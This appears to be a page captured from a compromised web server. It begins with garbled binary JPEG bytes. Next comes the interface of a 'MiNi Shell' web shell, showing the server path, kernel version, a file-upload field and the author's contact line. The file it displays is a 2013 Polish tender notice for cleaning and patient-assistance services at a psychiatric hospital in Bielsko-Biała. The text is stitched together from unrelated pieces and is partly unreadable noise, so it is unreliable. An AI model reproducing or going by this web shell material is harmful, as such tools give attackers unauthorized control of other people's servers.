JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131023/432254-N-2013.html

<p class="kh_header"><b>Bielsko-Biała: Świadczenie usług na rzecz Zamawiającego polegających na kompleksowym utrzymaniu czystości 
w obiektach  Specjalistycznego Psychiatrycznego Zespołu Opieki Zdrowotnej      w Bielsku - Białej, transporcie wewnątrz szpitalnym, obsłudze kuchenek oddziałowych oraz pomocy przy pacjencie.</b><br>
<b>Numer ogłoszenia: 432254 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej , ul. Olszówka 102, 43-309 Bielsko-Biała, woj. śląskie, tel. 33 8113923, faks 33 8113923.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozbielsko.wizja.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług na rzecz Zamawiającego polegających na kompleksowym utrzymaniu czystości 
w obiektach  Specjalistycznego Psychiatrycznego Zespołu Opieki Zdrowotnej      w Bielsku - Białej, transporcie wewnątrz szpitalnym, obsłudze kuchenek oddziałowych oraz pomocy przy pacjencie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1Przedmiotem zamówienia jest świadczenie usług na rzecz Zamawiającego polegających na kompleksowym utrzymaniu czystości w obiektach  Specjalistycznego Psychiatrycznego Zespołu Opieki Zdrowotnej w Bielsku - Białej, transportu wewnątrz szpitalnego, obsłudze kuchenek oddziałowych oraz pomocy przy pacjencie.2. Szczegółowy opis i zakres wykonywania usług został określony w załączniku nr 1  stanowiącym integralną część SIWZ,  pn. Szczegółowy zakres usług związanych z utrzymaniem czystości, transportem wewnątrzszpitalnym, obsługą kuchenek oddziałowych oraz pomocą przy pacjencie w obiektach SP ZOZ w Bielsku - Białej zlokalizowanych przy ul. Olszówka 102, ul. Mostowej 1.3. Wymagania odnoszące się do przedmiotu zamówienia 3.1 Usługi powinny zostać wykonane sprawnie, starannie i efektywnie przy współpracy z personelem szpitala, tak aby nie były uciążliwe zarówno dla personelu jak i dla samych pacjentów.3.2 Przedmiot zamówienia  obejmuje również świadczenie usługi polegającej na sprzątaniu pomieszczeń w trakcie remontów i po ich zakończeniu oraz w sytuacjach awaryjnych.3.3 Zamawiający zastrzega sobie prawo do zmiany wielkości powierzchni do sprzątania i dezynfekcji oraz zmiany zakresu i częstotliwości prac w zależności od potrzeb np. w przypadku remontu, czasowego wyłączenia części komórki organizacyjnej z działalności, jednak jest zobowiązany do powiadomienia Wykonawcy o tym z dwudniowym wyprzedzeniem.3.4 Wykonawca nie będzie ponosił opłat za korzystanie z energii elektrycznej oraz wody ciepłej i zimnej wykorzystanej do realizacji zamówienia. 3.5 Konsekwencje zastrzeżeń i decyzji dotyczących przedmiotu zamówienia wydanych przez Stacje Sanitarno Epidemiologiczne dotyczące wykonania usługi oraz stanu higieniczno sanitarnego obiektów ponosi Wykonawca. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez swoich pracowników w związku z wykonywaniem prac objętych przedmiotem zamówienia. Wykonawca zobowiązany będzie do naprawienia wyrządzonej szkody lub pokrycia kosztów jej usunięcia.3.6 Wykonywanie czynności transportu wewnętrznego zgodnie ze szczegółowym zakresem czynności określonym w załączniku nr 1 do SIWZ. 3.7 Obsługa kuchenek oddziałowych zgodnie ze szczegółowym zakresem czynności określonym w załączniku nr 1 do SIWZ,3.8 Wykonywanie czynności pomocniczych przy pacjentach na zlecenie Zamawiającego mogą być wykonywane wyłącznie w obecności personelu Zamawiającego, zajmującego się czynnościami w trakcie których Wykonawca świadczy czynności pomocnicze. Szczegółowy zakres czynności określony został w Załączniku nr 1 do SIWZ. 3.9 Wybrany Wykonawca zobowiązany będzie do przejęcia najpóźniej z dniem rozpoczęcia świadczenia usługi w trybie art. 231 Kodeksu pracy 23  pracowników Zamawiającego zatrudnionych obecnie przy wykonywaniu zadań objętych przedmiotem zamówienia. 3.10 Wykonawca zobowiązany będzie zatrudnić ww pracowników na zasadach wynikających z ich dotychczasowych umów o pracę oraz przepisów Kodeksu Pracy przez okres jednego roku od daty przejęcia pracowników.3.11 Wykaz pracowników zatrudnionych obecnie przy wykonywaniu czynności objętych przedmiotem zamówienia oraz informacje o warunkach zatrudnienia zawiera załączniki nr 5 SIWZ. Imienny wykaz pracowników zostanie przekazany Wykonawcy wybranemu w wyniku postępowania o zamówienie publiczne 3.12 Wykonawca zobowiązany jest do objęcia podległego personelu nadzorem lekarza medycyny pracy. Aktualne książeczki zdrowia należy przedstawiać Zamawiającemu przed przystąpieniem każdego pracownika do pracy, w tym zaświadczeń odnośnie wykonania szczepień przeciwko WZW typu B u pracowników przed rozpoczęciem pracy. 3.13 W przypadku wygaśnięcia umowy, w tym w wyniku odstąpienia od umowy bądź rozwiązania jej przed upływem okresu na jaki została zawarta, Zamawiający zobowiązuje się do ponownego zatrudnienia przekazanych Wykonawcy pracowników.  3.14 Zamawiający zastrzega sobie prawo kontroli terminowości i jakości świadczonych usług.3.15 Wykonawca wyznaczy osoby do koordynowania pracy personelu i bezpośredniego kontaktu z Zamawiającym.3.16 Wykonawca zobowiązany będzie do zapewnienia odpowiedniej liczby osób do wykonania usługi kompleksowego utrzymania czystości, transportu, obsługi kuchenek i pomocy przy pacjencie oraz do szybkiej interwencji na dowolnych odcinkach pracy. 3.17 Wykonawca zobowiązany jest posiadać przeszkolony i szkolić na bieżąco personel realizujący usługę kompleksowego utrzymania czystości, w zakresie zasad sprzątania w szpitalu, gospodarki odpadami oraz narażenia na czynniki biologiczne, fizyczne i chemiczne, obsługi sprzętu specjalistycznego także sprzętu będącego własnością Zamawiającego, wykonywania transportu oraz pomocy przy pacjencie.3.18 Zamawiający udostępni Wykonawcy następujące nieodpłatnie pomieszczenia z przeznaczeniem na magazynek podręczny na sprzęt i środki czystościowe w każdej komórce organizacyjnej (pomieszczenia porządkowe),szatnie - wyznaczone szafki w szatniach dla personelu Zamawiającego, znajdujące się w każdym budynku, pomieszczenie magazynowo-biurowe, zamykane, o powierzchni 31,96m2 w budynku technicznym3.19 W celu spełnienia określonych w SIWZ wymagań odnoszących się do przedmiotu zamówienia Zamawiający wymaga złożenia w ofercie oświadczenia, że preparaty stosowane przy wykonywania zamówienia będące produktami biobójczymi w rozumieniu ustawy z dnia 13 września 2002 r. o produktach biobójczych będą posiadać pozwolenia na wprowadzenie do obrotu lub pozwolenie tymczasowe lub będą posiadać wpis do rejestru produktów biobójczych  preparaty stosowane przy realizacji zamówienia zarejestrowane jako wyroby medyczne będą posiadały certyfikat CE, deklarację zgodności preparaty stosowane przy realizacji zamówienia będące preparatami niebezpiecznymi w rozumieniu ustawy z dnia 11 stycznia 2001 r. o substancjach i preparatach niebezpiecznych będą posiadały karty charakterystyki preparatu niebezpiecznego preparaty stosowane przy realizacji zamówienia rejestrowane jako produkty lecznicze będą posiadały pozwolenie na dopuszczenie do obrotu produktu leczniczego zgodnie z ustawą z dnia 6 września 2001 r. Prawo farmaceutyczne wykazu środków dezynfekcyjnych, myjących i higienicznych przewidzianych do realizacji zamówienia; informacji o organizacji pracy na poszczególnych odcinkach z podaniem liczby osób świadczących usługę utrzymania czystości oraz liczby etatów przypadających na poszczególne odcinki informacji o dostępności i sposobie komunikowania się Zamawiającego z pracownikami Wykonawcy wykaz sprzętu wykorzystywanego do realizacji zamówienia Wykonawca na podstawie Zał. Nr 1 do SIWZ oraz Tab. nr 1 i 2 tegoż załącznika opracuje i przedstawi Zamawiającemu do zatwierdzenia Plan Higieny, Uszczegółowiony harmonogram sprzątania oraz projekt karty sprzątania. 4Wykonanie przedmiotu zamówienia. Przedmiot zamówienia należy wykonać siłami własnymi lub w konsorcjum z innymi wykonawcami. Nie przewiduje się w realizacji zamówienia udziału podwykonawców..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.90.00.00-6, 85.11.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 Każda oferta musi być zabezpieczona wadium w wysokości 35 000,00 zł. Wadium może być wniesione w następujących formach 1.1 w pieniądzu 1.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 1.3 gwarancjach bankowych
1.4  gwarancjach ubezpieczeniowych 1.5  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 Nr 42, poz. 275, z późn. zm.) 2. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy 2.1 nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich  siedzib, 2.2 określenie wierzytelności, która ma być zabezpieczona gwarancją, 2.3 kwotę gwarancji, 2.4 termin ważności gwarancji 2.5 zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę  wybrano odmówił podpisania umowy na warunkach określonych w ofercie, lub nie wniósł zabezpieczenia należytego wykonania umowy, lub  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie  Wykonawcy, lub wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub   więcej Wykonawców wadium może zostać wniesione przez Lidera konsorcjum występującego w imieniu wszystkich jego uczestników, pod warunkiem, że został on do tego upoważniony.3. Miejsce i sposób wniesienia wadium 3.1. Wadium wnoszone w pieniądzu należy wpłacić na rachunek Zamawiającego nr  86 1050 1070 1000 0001 0618 7859 z dopiskiem Wadium  do przetargu na Świadczenie usług na rzecz Zamawiającego polegających na kompleksowym utrzymaniu czystości w obiektach  Specjalistycznego Psychiatrycznego Zespołu Opieki Zdrowotnej w Bielsku - Białej, transporcie wewnątrz szpitalnym, obsłudze kuchenek oddziałowych oraz pomocy przy pacjencie Do oferty należy  dołączyć kopię polecenia przelewu poświadczoną za zgodność z oryginałem przez Wykonawcę składającego ofertę. 3.2. Wadium w innych dopuszczonych formach (oryginały dokumentów) należy wnieść (zdeponować) w Kasie SPZOZ w Bielsku - Białej przy ul. Olszówka 102 od poniedziałku do piątku w godz. 8:00 - 12:00, a do oferty należy dołączyć poświadczoną przez Wykonawcę za zgodność z oryginałem kopię, 3.3 Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które w oznaczonym terminie w dniu otwarcia ofert znajduje się na rachunku Zamawiającego. 3.4 Wadium w formie nie pieniężnej Zamawiający uzna za skutecznie wniesione - jeżeli przedmiotowy dokument znajdzie się w kasie Zamawiającego w terminie wyznaczonym do składania ofert. 4. Termin wniesienia wadium Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie 	wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za 	skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że 	otrzymał taki przelew przed upływem terminu składania ofert. W wymienionym 	przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez 	Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.5.  Zwrot wadium Zamawiający, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp, zwraca wadium na wniosek wykonawcy który wycofał ofertę przed upływem terminu składania ofert, który został wykluczony z postępowania, którego oferta została odrzucona. Utrata wadium 6.1 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 6.2 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie nie wniósł wymaganego zabezpieczenia należytego wykonania umowa zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Czy posiada uprawnienia do wykonywania działalności jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wiedzy i doświadczenia, Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykaże wykonanie lub wykonywanie co najmniej 3  usług z  zakresu przedmiotu zamówienia, w tym bezwzględnie jednej z zakresu określonego w pkt. 2  SIWZ,  z których każda trwała lub trwa  co najmniej 12 miesięcy na rzecz zakładów opieki zdrowotnej, w tym posiadających co najmniej 1 oddział szpitalny, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje środkami wyposażenia technicznego w zakresie prac związanych z kompleksowym utrzymaniem czystości, transportu wewnętrznego w obiektach SP ZO zgodnie z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje lub będzie dysponował odpowiednimi osobami zdolnymi do wykonania zamówienia, a w szczególności osobami wykonującymi czynności pomocnicze przy pacjencie i , w tym: osobą odpowiedzialną za świadczenie usług - koordynatorem prac oraz osobą odpowiedzialną za kontrolę jakości świadczonych usług;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia, w tym: osiągnął w ostatnim roku obrotowym obrót (przychód) w wysokości nie niższej niż 2  miliony złotych netto oraz posiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż 1 milion  złotych oraz posiada aktualne ubezpieczenie odpowiedzialności cywilnej tytułu prowadzonej działalności na sumę gwarancyjną na jedno     i wszystkie zdarzenia nie niższą niż 1 milion złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust 1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie:
 1. Zmiana terminu przewidzianego na realizację usługi:
1.1  wstrzymanie realizacji usługi z przyczyn leżących po stronie Zamawiającego,
1.2 działania siły wyższej, 
1.3 wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających realizację usługi
2. Zmiany wynagrodzenia umownego: 
2.1 wystąpienia zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia zaistniałych po dacie zawarcia umowy (w szczególności: zmiany stawki podatku VAT,  itp.), 
2.2 wzrostu wskaźnika inflacji w danym roku w stosunku do roku poprzedniego o ponad 3% opublikowanego przez GUS;
3. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami np. z przyczyn niezależnych lub niemożliwych do przewidzenia przez Wykonawcę i Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozbielsko.wizja.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej w Bielsku - Białej,  , ul. Olszówka 102, 43-309 Bielsko - Biała, tel. 33 812 30 41, fax: 33 811 39 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 10:00, miejsce: Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej w Bielsku - Białej,  , ul. Olszówka 102, 43-309 Bielsko - Biała, tel. 33 812 30 41, fax: 33 811 39 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com